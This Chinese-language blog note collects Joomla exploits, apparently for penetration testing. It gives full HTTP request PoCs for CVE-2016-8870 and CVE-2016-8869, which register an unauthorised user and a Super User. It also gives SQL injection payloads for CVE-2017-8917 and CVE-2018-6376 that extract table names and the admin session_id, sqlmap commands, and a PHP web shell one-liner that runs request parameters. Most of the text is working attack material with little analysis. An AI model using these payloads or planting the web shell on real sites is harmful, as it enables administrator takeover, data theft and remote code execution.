joomla

可以用hashcat去破解joomla的hash加密

http://www.freebuf.com/sectool/164507.html

JoomScan:一款开源的OWASP Joomla漏洞扫描器

https://paper.tuisec.win/detail/ab43a0937e648d9

(影响版本3.4.4 to 3.6.3 ) Joomla未授权创建用户漏洞(CVE-2016-8870)分析

poc:
在网站首页的源码中找到token,

burpsuite截取修改发送一下数据包,注意填写cookie和yourtoken值。

POST /index.php/component/users/?task=registration.register HTTP/1.1
...
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryefGhagtDbsLTW5qI
...
Cookie: yourcookie

------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[name]"

attacker
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[username]"

attacker
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[password1]"

attacker
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[password2]"

attacker
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[email1]"

attacker@my.local
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[email2]"

attacker@my.local
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="option"

com_users
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="task"

user.register
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="yourtoken"

1
------WebKitFormBoundaryefGhagtDbsLTW5qI--

( 3.4.4 to 3.6.3)Joomla未授权创建特权用户漏洞(CVE-2016-8869)分析

https://paper.seebug.org/88/
poc:

POST /index.php/component/users/?task=registration.register HTTP/1.1
...
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryefGhagtDbsLTW5qI
...
Cookie: yourcookie

------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[name]"

attacker2
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[username]"

attacker2
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[password1]"

attacker2
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[password2]"

attacker2
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[email1]"

attacker2@my.local
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[email2]"

attacker2@my.local
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[groups][]"

7
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="option"

com_users
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="task"

user.register
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="yourtoken"

1
------WebKitFormBoundaryefGhagtDbsLTW5qI--

(1.6.0 - 3.6.4)Joomla 权限提升漏洞(CVE-2016-9838)分析

实现水平越权

(1.5.0到3.6.5)CVE-2017-7985&7986:详细分析 Joomla!两处XSS漏洞(含exp)

https://paper.tuisec.win/detail/e66d7bee425440a

[CVE-2017-8917]Joomla! 3.7.0 SQL Injection分析

poc:

http://192.168.0.6/joomla370/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x3e,database()),0)

Joomla!3.7.0 Core SQL注入漏洞 利用详解及脚本

https://paper.tuisec.win/detail/4d6b0130767fd51

获取表前缀

updatexml(1,concat(0x5e24,(select%20*%20from%20(SELECT TABLE_NAME FROM%20information_schema.TABLE_CONSTRAINTS%20limit 1,1)aa%20),0x5e24),1)

尝试使用substring读取指定范围数据绕过过滤:

updatexml(1,concat(0x5e24,(select%20*%20from%20(SELECT%20substring(TABLE_NAME,1,6)%20FROM%20information_schema.TABLE_CONSTRAINTS%20limit 1,1)aa%20),0x5e24),1)

Joomla 3.70 com_fields组件sql注入及joomla3.x拿后台shell

<?php $sl = create_function('', @$_REQUEST['70sec']);$sl();?>

(<=3.8.3 OR >= 3.7.0 ) 分析CVE-2018-6376 - Joomla!,二阶SQL注入

版本<=3.8.3 OR >= 3.7.0
https://www.notsosecure.com/analyzing-cve-2018-6376/
注册一个yesi的manage用户,尝试得到admin的session_id,(admin有登入)以超级管理员的权限访问程序。
poc:


administrator/index.php?option=com_admin&view=profile&layout=edit&id= save 抓包,在‘jform [params] [admin_style]’添加[0],下面添加
payload:

python sqlmap.py -r "joomla.txt" --dbms mysql  "http://192.168.0.6/joomla383/administrator/index.php" -D "joomla383" --dbs

extractvalue(0x0a,concat(0x0a,(select session_id from nvybl_session where username='admin')))


administrator/index.php 查看返回的session_id

sqlmap工具利用:
这里,有效负载中的’*’将作为SQLMap工具的标记,用于注入有效负载,例如:

复制bp抓包到的内容到 joomla.txt 文件中

extractvalue(0x0a,concat(0x0a,(select @@version where 1=1 AND 5231 = 5231)))
extractvalue(0x0a,concat(0x0a,(select @@version where 1=1 AND 5231 = 1623)))
extractvalue(0x0a,concat(0x0a,(select @@version where 1=1 or 7231 = 7231)))
extractvalue(0x0a,concat(0x0a,(select @@version where 1=1 union all select NULL,NULL,NULL,'21231231232')))

sqlmap命令行

python sqlmap.py -r "joomla.txt" --dbms mysql  "http://192.168.0.6/joomla383/administrator/index.php" -D "joomla383" --dbs

当前网速较慢或者你使用的浏览器不支持博客特定功能,请尝试刷新或换用Chrome、Firefox等现代浏览器